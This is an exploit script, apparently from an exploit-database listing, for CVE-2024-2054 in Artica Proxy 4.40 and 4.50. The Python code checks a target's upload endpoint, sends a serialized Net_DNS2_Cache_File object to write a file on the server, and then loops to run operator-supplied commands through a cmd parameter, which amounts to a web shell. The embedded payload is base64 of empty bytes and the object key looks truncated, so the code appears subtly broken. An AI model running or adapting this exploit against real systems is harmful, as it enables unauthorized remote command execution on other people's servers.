# Exploit Title: Artica Proxy 4.50 - Remote Code Execution (RCE) # Date: 23-04-2024 # Exploit Author: Madan # Vendor Homepage: https://artica-proxy.com/ # Version: 4.40, 4.50 # Tested on: [relevant os] # CVE : CVE-2024-2054 you can also find the exploit on my github repo: https://github.com/Madan301/CVE-2024-2054 import requests import base64 import urllib3 from colorama import Fore print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might sometimes vary from how artica proxy interface is hosted") URL = input("Enter url: ") if URL[-1]=="/": ACTUAL_URL = URL[:-1] else: ACTUAL_URL = URL ARTICA_URL = ACTUAL_URL def check(ARTICA_URL): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) try: check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False) except Exception as e: print(Fore.RED+"Could not reach, check URL") if check.status_code==200: print(Fore.GREEN+"Vulnerable") return True else: print(Fore.RED+"Not Vulnerable") def exploit(ARTICA_URL): payload = base64.b64encode(b"").decode() payload_data = { "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": { "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php", "cache_serializer": "json", "cache_size": 999999999, "cache_data": { payload: { "cache_date": 0, "ttl": 999999999 } } } } while True: PAYLOAD_CMD = input("enter command: ") url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}" urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) response = requests.get(url, verify=False) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) if response.status_code == 200: cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}" cmd_response = requests.get(cmd_url, verify=False) urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print(cmd_response.text) else: print("Failed to execute the payload") check = check(ARTICA_URL=ACTUAL_URL) if check==True: exploit(ARTICA_URL=ARTICA_URL)